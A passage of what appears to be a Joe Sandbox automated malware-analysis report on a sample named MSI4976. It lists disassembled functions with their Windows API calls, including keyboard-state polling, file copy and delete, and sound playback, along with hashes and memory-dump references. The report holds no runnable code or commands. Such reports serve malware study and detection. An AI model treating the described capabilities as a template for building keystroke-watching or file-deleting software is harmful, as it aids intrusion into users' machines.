                                          • Part of subcall function 0034234B: __woutput_l.LIBCMT ref: 003423A4
                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 0036725D
                                        • LoadResource.KERNEL32(?,00000000), ref: 00367269
                                        • LockResource.KERNEL32(00000000), ref: 00367276
                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00367296
                                        • LoadResource.KERNEL32(?,00000000), ref: 003672A8
                                        • SizeofResource.KERNEL32(?,00000000), ref: 003672B7
                                        • LockResource.KERNEL32(?), ref: 003672C3
                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00367322
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                        • String ID: L6=
                                        • API String ID: 1433390588-1471508690
                                        • Opcode ID: b3a690187fd5ca56f68cabbb2b47121a64d02e52880188ffc7c9b47f549ea694
                                        • Instruction ID: 658b4012fed8b4d05f4d54da81394c8a19a2525c44b200f70da69c5d06fab094
                                        • Opcode Fuzzy Hash: b3a690187fd5ca56f68cabbb2b47121a64d02e52880188ffc7c9b47f549ea694
                                        • Instruction Fuzzy Hash: F331CDB590425AABDB139F60DC88AEF7BACFF09344F508825FD02E6250E734D950DAB0
                                        Function 003683D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0036843F
                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00368455
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00368466
                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00368478
                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00368489
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: SendString$_memmove
                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                        • API String ID: 2279737902-1007645807
                                        • Opcode ID: 1e1248f8720324610486d4c6aceff25fe3ed1c0e199d5c2b53dedbc093ff61d4
                                        • Instruction ID: a525ec3af9f304aca283d101088d7fd485851f29050c83d66290559c0b2bab3d
                                        • Opcode Fuzzy Hash: 1e1248f8720324610486d4c6aceff25fe3ed1c0e199d5c2b53dedbc093ff61d4
                                        • Instruction Fuzzy Hash: 8811E7B2A4016D79D713A7A2EC4ADFF7B7CEB95B00F00492AF411A61D5DEA04E44C5B1
                                        Function 0039EC19 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 59windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?), ref: 0039EC32
                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0039EC49
                                        • GetWindowDC.USER32(?), ref: 0039EC55
                                        • GetPixel.GDI32(00000000,?,?), ref: 0039EC64
                                        • ReleaseDC.USER32(?,00000000), ref: 0039EC76
                                        • GetSysColor.USER32(00000005), ref: 0039EC94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                        • String ID: @U=u
                                        • API String ID: 272304278-2594219639
                                        • Opcode ID: 7477dea19735847ac4a6b6b76c0225c4a960beef33c874a806e3e344ad64a885
                                        • Instruction ID: 0725fa998927c80c996948fbaacd132c00684be67984f383e008650d81127465
                                        • Opcode Fuzzy Hash: 7477dea19735847ac4a6b6b76c0225c4a960beef33c874a806e3e344ad64a885
                                        • Instruction Fuzzy Hash: A2216A31500205FFDB62AF64EC88BE97BB9EB06325F518224FA66A54F1CB314A41DF21
                                        Function 0036C890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0036C6A0: __time64.LIBCMT ref: 0036C6AA
                                          • Part of subcall function 003241A7: _fseek.LIBCMT ref: 003241BF
                                        • __wsplitpath.LIBCMT ref: 0036C96F
                                          • Part of subcall function 0034297D: __wsplitpath_helper.LIBCMT ref: 003429BD
                                        • _wcscpy.LIBCMT ref: 0036C982
                                        • _wcscat.LIBCMT ref: 0036C995
                                        • __wsplitpath.LIBCMT ref: 0036C9BA
                                        • _wcscat.LIBCMT ref: 0036C9D0
                                        • _wcscat.LIBCMT ref: 0036C9E3
                                          • Part of subcall function 0036C6E4: _memmove.LIBCMT ref: 0036C71D
                                          • Part of subcall function 0036C6E4: _memmove.LIBCMT ref: 0036C72C
                                        • _wcscmp.LIBCMT ref: 0036C92A
                                          • Part of subcall function 0036CE59: _wcscmp.LIBCMT ref: 0036CF49
                                          • Part of subcall function 0036CE59: _wcscmp.LIBCMT ref: 0036CF5C
                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0036CB8D
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0036CC24
                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0036CC3A
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0036CC4B
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0036CC5D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                        • String ID:
                                        • API String ID: 152968663-0
                                        • Opcode ID: 2dade983973cd52f9f15dc94ecb6de433c7f4a62ce54c089dd6da69929d7a1ff
                                        • Instruction ID: 0074fff89ca7da93934894d53c7284398a1f6b09d1a169b9d9f411e5ba4d3bbe
                                        • Opcode Fuzzy Hash: 2dade983973cd52f9f15dc94ecb6de433c7f4a62ce54c089dd6da69929d7a1ff
                                        • Instruction Fuzzy Hash: D9C11CB1900129AADF12DF95CC81EEEB7BDEF49310F0080A6F649EB155D7709A84CF65
                                        Function 003708D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                        • String ID:
                                        • API String ID: 3566271842-0
                                        • Opcode ID: 93dffb347f7d4c1716fa1b99aadeccd988f45f19f7803914c0c9dcab28131211
                                        • Instruction ID: b8d2492dcb055b4bf891377449fc93179e8635ead767fab58b4e3de8b6b0cdb2
                                        • Opcode Fuzzy Hash: 93dffb347f7d4c1716fa1b99aadeccd988f45f19f7803914c0c9dcab28131211
                                        • Instruction Fuzzy Hash: 6C712C75A00219EFDB15DFA4D885ADEB7B8FF49310F048095E919AB261DB34EE40CF90
                                        Function 0036388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 00363908
                                        • SetKeyboardState.USER32(?), ref: 00363973
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00363993
                                        • GetKeyState.USER32(000000A0), ref: 003639AA
                                        • GetAsyncKeyState.USER32(000000A1), ref: 003639D9
                                        • GetKeyState.USER32(000000A1), ref: 003639EA
                                        • GetAsyncKeyState.USER32(00000011), ref: 00363A16
                                        • GetKeyState.USER32(00000011), ref: 00363A24
                                        • GetAsyncKeyState.USER32(00000012), ref: 00363A4D
                                        • GetKeyState.USER32(00000012), ref: 00363A5B
                                        • GetAsyncKeyState.USER32(0000005B), ref: 00363A84
                                        • GetKeyState.USER32(0000005B), ref: 00363A92
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: f302f738d663cf5a58298afb7a557878de3535997a2767d3bdf39d6c7eae6c31
                                        • Instruction ID: feafd8609fe5a5eea2de783a228a2d53d4d074799e9bbd1b929e63bb85550dff
                                        • Opcode Fuzzy Hash: f302f738d663cf5a58298afb7a557878de3535997a2767d3bdf39d6c7eae6c31
                                        • Instruction Fuzzy Hash: D151A920E0878429FB37EBA488117EAAFF45F12344F09C59DD5C25B5C6DB649B8CCB62
                                        Function 0035FAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 0035FB19
                                        • GetWindowRect.USER32(00000000,?), ref: 0035FB2B
                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0035FB89
                                        • GetDlgItem.USER32(?,00000002), ref: 0035FB94
                                        • GetWindowRect.USER32(00000000,?), ref: 0035FBA6
                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0035FBFC
                                        • GetDlgItem.USER32(?,000003E9), ref: 0035FC0A
                                        • GetWindowRect.USER32(00000000,?), ref: 0035FC1B
                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0035FC5E
                                        • GetDlgItem.USER32(?,000003EA), ref: 0035FC6C
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0035FC89
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0035FC96
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        • Opcode ID: 52418ed2252ed586f57cd3eef8138c0ff9d746e8aa6ae588d7f8ed1d3373807e
                                        • Instruction ID: 7e135e65bf2218ec82b07f4d1dcae6d6f1aaeea70537825ed3768465e11517a2
                                        • Opcode Fuzzy Hash: 52418ed2252ed586f57cd3eef8138c0ff9d746e8aa6ae588d7f8ed1d3373807e
                                        • Instruction Fuzzy Hash: 92514F71B00209AFDB09CF68CD95EAEBBBAEB89301F15813DF916D76A0D7709D048B10
                                        Function 0033B039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033B155: GetWindowLongW.USER32(?,000000EB), ref: 0033B166
                                        • GetSysColor.USER32(0000000F), ref: 0033B067
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ColorLongWindow
                                        • String ID:
                                        • API String ID: 259745315-0
                                        • Opcode ID: 662572e8cf136c735e52b4f58e00098b606966b0c870478bea36260cf80e8fe4
                                        • Instruction ID: cf71f78a7e772982627264d202dc707795c035588cd9828ce3a909b8daab42d1
                                        • Opcode Fuzzy Hash: 662572e8cf136c735e52b4f58e00098b606966b0c870478bea36260cf80e8fe4
                                        • Instruction Fuzzy Hash: 4341A131100540AFDB27AF28DCD8BBA7B69AB06724F194365FE768A1E2D7318C41DB21
                                        Function 00367334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                        • String ID:
                                        • API String ID: 136442275-0
                                        • Opcode ID: d5acae877f55a97e31f71704fa8db7ffd6f34d390c0f29441c1d0e2d9033c0f3
                                        • Instruction ID: 0913a015d4bf563365575accfc6e39a4a0ae38385c06595a2585adfd93327cf4
                                        • Opcode Fuzzy Hash: d5acae877f55a97e31f71704fa8db7ffd6f34d390c0f29441c1d0e2d9033c0f3
                                        • Instruction Fuzzy Hash: 8E411FB280452CAADB26EB50CC45EDE73BCAB48314F5081E6F519A6055EF71ABD4CFA0
                                        Function 0038B14A Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167COMMON
                                        Download Yara Rule
                                        APIs
                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0038B204
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: InvalidateRect
                                        • String ID: @U=u
                                        • API String ID: 634782764-2594219639
                                        • Opcode ID: 9a18ab9599f91372f4cfe21d4022d1099709d002222cb8de42e45021773ca783
                                        • Instruction ID: 24c452079ad0355be9f2556966810a971420cd8d393e2f9b9a583b5df98e2478
                                        • Opcode Fuzzy Hash: 9a18ab9599f91372f4cfe21d4022d1099709d002222cb8de42e45021773ca783
                                        • Instruction Fuzzy Hash: 1A51A134500306BFEF32BF28CC99B9EBB69AB06350F204592FA55DA5E1C7B1E9548B50
                                        Function 0033A599 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0039E9EA
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0039EA0B
                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0039EA20
                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0039EA3D
                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0039EA64
                                        • DestroyCursor.USER32(00000000), ref: 0039EA6F
                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0039EA8C
                                        • DestroyCursor.USER32(00000000), ref: 0039EA97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                        • String ID: @U=u
                                        • API String ID: 3992029641-2594219639
                                        • Opcode ID: 7ec55fdf68a4b5788edbd9c6e8a818744dea9ce15d50b413c11d70e4ae9115a7
                                        • Instruction ID: b685e770ae622f2c88ff475de1cbba23da03acd01376b6d8cf8d4d81a3ae6002
                                        • Opcode Fuzzy Hash: 7ec55fdf68a4b5788edbd9c6e8a818744dea9ce15d50b413c11d70e4ae9115a7
                                        • Instruction Fuzzy Hash: 51516870600605AFDB22DF69CCC2FAA77B9BB09754F104619F9869B6E0D7B0ED80DB50
                                        Function 003284A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                        Download Yara Rule
                                        APIs
                                        • __swprintf.LIBCMT ref: 003284E5
                                        • __itow.LIBCMT ref: 00328519
                                          • Part of subcall function 00342177: _xtow@16.LIBCMT ref: 00342198
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __itow__swprintf_xtow@16
                                        • String ID: %.15g$0x%p$False$True
                                        • API String ID: 1502193981-2263619337
                                        • Opcode ID: 2ee54f50f4cc830e5842a08e7e6b7cda8bd74ec582cebf29838103f672ffe2d3
                                        • Instruction ID: 510831f0f3e7747c3d8c30741881edd400864679a136272d68408a320ac38673
                                        • Opcode Fuzzy Hash: 2ee54f50f4cc830e5842a08e7e6b7cda8bd74ec582cebf29838103f672ffe2d3
                                        • Instruction Fuzzy Hash: 98412B316006159BDB27EF38E841F6A73E9FF45300F20446EE54ADB182EE31EA81CB50
                                        Function 0035C6FD Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 81windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0035C782
                                        • GetDlgCtrlID.USER32 ref: 0035C78D
                                        • GetParent.USER32 ref: 0035C7A9
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0035C7AC
                                        • GetDlgCtrlID.USER32(?), ref: 0035C7B5
                                        • GetParent.USER32(?), ref: 0035C7D1
                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0035C7D4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$_memmove
                                        • String ID: @U=u$ComboBox$ListBox
                                        • API String ID: 313823418-2258501812
                                        • Opcode ID: 5b9742f734abce70e0ddd0ec7c720dd054e12ea952b13126765a2066a7537c41
                                        • Instruction ID: 94b37032ea05d4cdeac944923f53329249ccaadb4fcf5cc7293828553729561a
                                        • Opcode Fuzzy Hash: 5b9742f734abce70e0ddd0ec7c720dd054e12ea952b13126765a2066a7537c41
                                        • Instruction Fuzzy Hash: 6321C474900208AFCB06EB60CC95DFE7769EF4A301F500115F922972E1DB785919DB20
                                        Function 0035C7E6 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 80windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0035C869
                                        • GetDlgCtrlID.USER32 ref: 0035C874
                                        • GetParent.USER32 ref: 0035C890
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0035C893
                                        • GetDlgCtrlID.USER32(?), ref: 0035C89C
                                        • GetParent.USER32(?), ref: 0035C8B8
